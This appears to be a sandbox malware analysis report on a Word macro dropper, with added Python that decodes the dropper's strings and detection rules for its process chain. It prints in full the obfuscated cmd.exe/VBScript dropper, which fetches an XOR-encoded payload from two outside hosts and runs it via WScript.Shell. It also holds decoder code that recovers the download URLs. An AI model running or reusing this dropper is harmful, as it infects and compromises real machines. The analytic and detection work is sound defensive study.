HTTP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Header | Total Bytes Transferred (KB) |
---|---|---|---|---|---|---|
Jul 7, 2016 16:16:26.571135044 CEST | 49224 | 80 | 192.168.1.15 | 109.237.253.100 | | 1845 |
Jul 7, 2016 16:16:26.696515083 CEST | 80 | 49224 | 109.237.253.100 | 192.168.1.15 | | 1846 |
Jul 7, 2016 16:16:26.852958918 CEST | 49225 | 80 | 192.168.1.15 | 94.76.192.140 | | 1847 |
Jul 7, 2016 16:16:26.992307901 CEST | 80 | 49225 | 94.76.192.140 | 192.168.1.15 | | 1847 |
System Behavior |
---|
General |
---|
Start time: | 16:15:51 |
Start date: | 07/07/2016 |
Path: | C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | unknown |
Imagebase: | 0xe30000 |
File size: | 1923232 bytes |
MD5 hash: | FEC5FFC0B51C78D9376A74CD2855D479 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 16:30:00 |
Start date: | 07/07/2016 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | C:\Windows\System32\cmd.exe /V /C set GBG=C:\Users\admin\AppData\Roaming\%RANDOM%.vbs && (for %i in ( DIm DxF3znV FunCTIoN RM7H(TqP SUpcFxy) BCGW2=65 dIM Qiw O2ErlP PEd4 Qo1rh7B=85 fOr Qiw=1 tO (Len(TqP)/2) O2ErlP=(XtPB7z2((-3701+3739)) & XtPB7z2((524880/7290))&(mId(TqP (Qiw+Qiw)-1 2))) PEd4=(MZrD(Mid(SUpcFxy ((Qiw moD LEn(SUpcFxy))+1) 1))) RM7H=RM7H+XtPB7z2(KLGYdz(O2ErlP PEd4)) NEXt RCTUfL=22 EnD fUncTIOn Cllae0=23 KyzlwC sUB KyzlwC() OF=45 DIm Tw Jl WC8fC Ui=84 Tw=96824294 KNatGfc=89 FOr Jl=1 tO Tw WC8fC=WC8fC+1 NexT Xt=77 iF WC8fC=Tw Then Ep8UXJ=64 Mule6z((1336770/4951)) DFyX5SF=24 PbE0o(RM7H( 2B39233377786C28342C3B362F29222F223E3163342C2078253A79293D30 WCM )) N08kbpy=70 eLsE TeDg=46 SG5Ave=28 EnD iF TSoUPG=33 EnD suB FUnCTIoN XtPB7z2(C9NbQom) PkAKI0E=14 XtPB7z2=Chr(C9NbQom) LK=15 eND FuNCTiON SuB Wusodn4() XuOFto5=43 Dim UQFOGB KJk For UQFOGB = 38 To 9000267 KJk = RyQrP + 83 + 80 + 90 Next DVYff=1 End sUB SUb M0cJLn() NM=43 diM VW ELc PCds BjuC5aE NH=28 PCds= Mt=19 ELc=DxF3znV & TKsHu & RM7H( 7D045507 NSp8wZ0 ) RQwDOV=4 MNs9uB DxF3znV ELc O5t=91 iF BjuC5aE= THen Mule6z(4) L1ksUsW=17 VW= SIrWOMB LwjuV=31 SEt BwZn=cREaTeOBject(RM7H( 1E21343D24322767213F2A212E VW)) BVv1A=80 BwZn.RUn RM7H( 2D1C2F6F1D4E266E5E08612B62021C256B635A1661 CNqKAx6 ) & ELc & PCds 8134-8134 2260-2260 TIbnnCE=13 End Sub SuB SsQ() P1t=5 dIM NgoLmHV TGr Cv80c3=62 Do WhIle NgoLmHV<>5317-5316 TGr=TGr+1 WSCript.sLEEP(28) Loop D1zerr=83 EnD sUB sUb Mule6z(RevOKyJ) WQ50Sb6=91 DiM LpZsh QW=34 LpZsh=timER+RevOKyJ dO whIle TiMeR<LpZsh wSCRiPt.Sleep(2) Loop Er8g9=8 EnD sUB fUNCtion TKsHu() GtkE=70 TKsHu=SecONd(TImE) OZgqxC=48 enD fUnCTioN FUncTioN PbE0o(SE1cf) ReuR=18 dIM RAOx XkSvP CNlxWn EPNWwO PQMM YVYNy=1 On erroR reSUmE NeXt ARJH8=74 CNlxWn= QAMNVmL R0VOo=25 sET RAOx=crEATEobjECT(RM7H( 161E2D24043C256F1E26330120 CNlxWn)) LRRQfm=62 Wusodn4 X77kzx=91 Set OAmVp=RAOx.ENVirOnMeNT(RM7H( 33250E20321230 Acw )) XIzNEID=1 DxF3znV=OAmVp(RM7H( 13110413131515 WRAT ))&XtPB7z2((830-738))& TKsHu & 
TKsHu TC3=16 EPNWwO= IHCr I5DpS=10 SeT XkSvP=crEatEobJEcT(RM7H( 052A113B27301D2F3C6D2A04040B261D18 EPNWwO)) KU=48 XkSvP.OPen RM7H( 0E713D XI4i0 ) SE1cf 9990-9990 Ie=16 XkSvP.SEtRequeSTheaDer RM7H( 1F5409572A QM5g0OA ) RM7H( 3320022422644371686A5B AQYv ) YYYHtq1=70 XkSvP.SEnD() X0E0=33 if XkSvP.STAtuSTExt=RM7H( 13122A371A392F531B2C1D2C261D2C XCs ) then SqN2=57 Wusodn4 GX=46 Mule6z(4) Yad=55 FH XkSvP.rEspoNseBoDY MMA=83 Else Wuc8=82 PQMM= E3rz X6KS=14 SeT XkSvP= creatEoBJECt(RM7H( 7E1B19375C011523475C22087F3A2E1163 PQMM)) BjdWH=29 XkSvP.OpeN RM7H( 292B35 Mnna0kE ) RM7H( 5E30324074196B2F5423572D355F20182A2344615033685A3E51 N6DF0 ) 9751-9751 VcHw=29 XkSvP.sEtrEqUeSTHEaDEr RM7H( 332E0F2804 Oa ) RM7H( 542A4628456E077D0F601F M6S2 ) VMX=37 XkSvP.SEnD() QSABO=86 If XkSvP.StatUSTeXT=RM7H( 2350304D252E1F110156223B165F36 Os1B9L ) tHEn FH XkSvP.responSeBODy I3D=66 Jhd=59 end if OFqx1=45 End FUncTIOn sUb FH(YAuf) Yn=86 dIm M5 Y9zz983 O9zJmIO=30 Y9zz983= XF PMY=63 SEt M5=createObJECt(RM7H( 071C091C0476152C343D2735 Y9zz983)) VZ1=19 M5.OpeN YVIgE=35 M5.TYpE=9542-9541 FH5xrC=28 M5.WritE YAuf WN8ajm=73 M5.sAVetoFiLe DxF3znV 5206-5204 QKYC=21 M5.cLoSE FzUz8m=8 M0cJLn Iw6Z=36 eND SUb funcTioN MZrD(QAd) JrGZqM=95 MZrD=ASc(QAd) GvVffY=48 enD FuNcTiON funCTion MNs9uB(LXzuy NUa) SOv6=61 dIm GH7 KJkz AdyAC OPkR Fp(7) KA=45 Fp(1)=106 IXQyb=39 Fp(6)=115 CFw=41 Fp(2)=118 RwOAf4r=86 Fp(3)=103 U0r=78 Fp(7)=111 MJ56ht=71 Fp(4)=116 KTBrm=13 Fp(0)=115 CtMg=90 Fp(5)=104 GJQ=89 PSKfp1=28 sET GH7=cREaTEobjEct(RM7H( 002431302538253D206D1F3C2029003E302D302103312D263A21 LSGCYUL )) PeN5TC8=50 Set KJkz=GH7.gETfilE(LXzuy) XcYZQp=30 sET OPkR=KJkz.oPenastExtstrEaM(733-732 8036-8036) DXG=52 sEt AdyAC=GH7.CREaTETextFile(NUa 239-238 3016-3016) RU0xHi=89 dO UntIl OPkR.AtENdOfstrEam AdyAC.WrITe XtPB7z2(KLGYdz(MZrD(OPkR.reAd(4298-4297)) Fp(0))) LOOp Uu48fY=88 AdyAC.CLOse Oc=29 OPkR.CLOse FTHurcs=65 End fuNCtIOn fUNCtIon KLGYdz(Qtoxg Fjo) RsgNc=91 KLGYdz=(Qtoxg ANd Not Fjo)Or(noT Qtoxg aND Fjo) Pq4oC=28 eNd fUnction 
) do @echo %~i)> !GBG! && start !GBG! |
Imagebase: | 0x77640000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Programmed in: | C, C++ or other language |
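The cmd.exe command line above is the whole dropped script: cmd writes each token of the `for %i in (...)` list into `!GBG!` with `@echo %~i`, and because `%~i` strips surrounding quotes, every string literal in the script (including the decoder keys) appears unquoted here. The script's string decoder, `RM7H`, takes a hex string and a key, XORs byte i with key character `(i Mod Len(key)) + 1`, and `KLGYdz` is just XOR spelled out with And/Or/Not. What follows is an added example, not part of the report and not the dropper's own code: a Python re-implementation of that decoder run over hex/key pairs copied verbatim from the command line, plus the byte-wise XOR with 115 (`Fp(0)`) that `MNs9uB` applies to the downloaded file before writing the `.tmp`. The function names, the `SAMPLES` labels and the `MZ` test bytes are this example's own.

```python
"""Added example (not from the report or the malware author): Python
re-implementation of the string decoder the dropped VBS calls RM7H, run over
hex/key pairs copied from the cmd.exe command line in the report, plus the
single-byte XOR the script applies to the downloaded file (Fp(0) = 115)."""


def vbs_xor_decode(hex_string: str, key: str) -> str:
    """RM7H(TqP, SUpcFxy): for Qiw = 1 To Len(TqP)/2, take the hex pair at
    Mid(TqP, 2*Qiw-1, 2), XOR it with Asc(Mid(key, (Qiw Mod Len(key)) + 1, 1))
    and append Chr() of the result. Indices are converted to Python's 0-based."""
    out = []
    for i in range(1, len(hex_string) // 2 + 1):
        byte = int(hex_string[2 * i - 2:2 * i], 16)   # "&H" & Mid(TqP, 2i-1, 2)
        k = ord(key[i % len(key)])                    # Mid(key, (i Mod Len)+1, 1)
        out.append(chr(byte ^ k))                     # KLGYdz(a, b) == a XOR b
    return "".join(out)


def file_xor_decode(data: bytes, key_byte: int = 115) -> bytes:
    """MNs9uB: the script reads the download one byte at a time and XORs each
    byte with Fp(0) = 115 before writing the .tmp file. XOR is symmetric, so
    the same call encodes and decodes."""
    return bytes(b ^ key_byte for b in data)


# Hex strings and key literals as they appear in the report's command line.
SAMPLES = {
    "shell_progid": ("1E21343D24322767213F2A212E", "SIrWOMB"),
    "env_name":     ("13110413131515", "WRAT"),
    "url_1":        ("2B39233377786C28342C3B362F29222F223E3163342C2078253A79293D30", "WCM"),
    "url_2":        ("5E30324074196B2F5423572D355F20182A2344615033685A3E51", "N6DF0"),
}


def decode_all() -> dict:
    """Decode every sample; keys of the result are the SAMPLES labels."""
    return {name: vbs_xor_decode(h, k) for name, (h, k) in SAMPLES.items()}


if __name__ == "__main__":
    for name, value in decode_all().items():
        print(f"{name:13s} {value}")
    # Constructed payload: a blob whose first bytes XOR-decode to an MZ header.
    encoded = file_xor_decode(b"MZ\x90\x00", 115)
    print(file_xor_decode(encoded, 115)[:2])
```

Run over the report's own strings, the decoder returns the `WScript.Shell` ProgID, the `APPDATA` environment variable name, and two download URLs on the domains listed under Contacted Domains, ecovalduloir.com first and idmaison.net second. That ordering matches the network record: the first HTTP exchange (to 109.237.253.100) is the one the "HTTP/1.1 404 Not Found" signature refers to, and the script then falls through to its second request (to 94.76.192.140). A payload fetched this way is useless on disk until it is XOR-decoded with 115, so detection that keys on the downloaded bytes alone should run the same single-byte XOR before looking for an `MZ` header.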
General |
---|
Start time: | 16:33:00 |
Start date: | 07/07/2016 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | C:\Windows\System32\WScript.exe C:\Users\admin\AppData\Roaming\17438.vbs |
Imagebase: | 0x77640000 |
File size: | 141824 bytes |
MD5 hash: | 979D74799EA6C8B8167869A68DF5204A |
Programmed in: | C, C++ or other language |
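The three process entries above give the execution chain in order: WINWORD.EXE starts cmd.exe with delayed expansion (`/V`), cmd builds a `%RANDOM%.vbs` under `AppData\Roaming` with a for/echo loop and then `start !GBG!`, and wscript.exe runs the resulting `17438.vbs`. The following is an added example, not part of the report: process-creation detection logic that fires on each link of that chain, run over constructed events. The Sysmon-style field names `ParentImage`, `Image` and `CommandLine` are an assumption, and the cmd.exe command line in the second event is a shortened copy of the one in the report (the script body is elided with `...`).

```python
"""Added example (not part of the report): process-creation detections for
the chain the report records (WINWORD.EXE -> cmd.exe echo-loop VBS dropper ->
wscript.exe running a script from AppData\\Roaming). Events are constructed;
the field names follow Sysmon event 1 as an assumption."""
import re

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Distinctive tokens of the echo-loop dropper; all must be present to fire.
DROPPER_RE = [
    re.compile(r"\bcmd(\.exe)?\s+/v\b", re.I),                          # delayed expansion on
    re.compile(r"%random%", re.I),                                      # random script name
    re.compile(r"\.vbs\b", re.I),                                       # script extension
    re.compile(r"\bfor\s+%\w+\s+in\b.*\bdo\s+@?echo\b", re.I | re.S),  # for/echo loop
    re.compile(r">\s*![A-Za-z_]\w*!", re.I),                            # redirect into !VAR!
    re.compile(r"\bstart\s+![A-Za-z_]\w*!", re.I),                      # start !VAR!
]
ROAMING_SCRIPT_RE = re.compile(r"\\AppData\\Roaming\\[^\\\s]+\.vbs\b", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Names of the detections that fire on one process-creation event."""
    hits = []
    parent = basename(event["ParentImage"])
    image = basename(event["Image"])
    cmd = event["CommandLine"]
    if parent in OFFICE_IMAGES and image in {"cmd.exe", "powershell.exe", *SCRIPT_HOSTS}:
        hits.append("office_spawns_shell")
    if image == "cmd.exe" and all(r.search(cmd) for r in DROPPER_RE):
        hits.append("cmd_echo_loop_vbs_dropper")
    if image in SCRIPT_HOSTS and ROAMING_SCRIPT_RE.search(cmd):
        hits.append("script_host_runs_roaming_vbs")
    return hits


# Constructed events. Event 0 is benign; event 1's CommandLine is a shortened
# copy of the report's cmd.exe command line; event 2 mirrors the wscript entry.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir C:\Users\admin"},
    {"ParentImage": r"C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /V /C set GBG=C:\Users\admin\AppData\Roaming\%RANDOM%.vbs"
                    r" && (for %i in ( DIm DxF3znV FunCTIoN RM7H(TqP SUpcFxy) ... ) do @echo %~i)> !GBG! && start !GBG!"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"C:\Windows\System32\WScript.exe C:\Users\admin\AppData\Roaming\17438.vbs"},
]


def run(events=EVENTS) -> dict:
    """Map event index -> detections, for every event that fires at least one."""
    results = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for idx, hits in run().items():
        print(idx, hits)
```

The dropper rule requires every token so that ordinary `cmd /V` batch usage does not fire; the parent/child rule is the broad one and is the right place to catch variants that swap the echo loop for something else. The `%RANDOM%` in the recorded command line and the `17438.vbs` actually executed are the same file, which is why the third rule matches on the directory and extension rather than on a name.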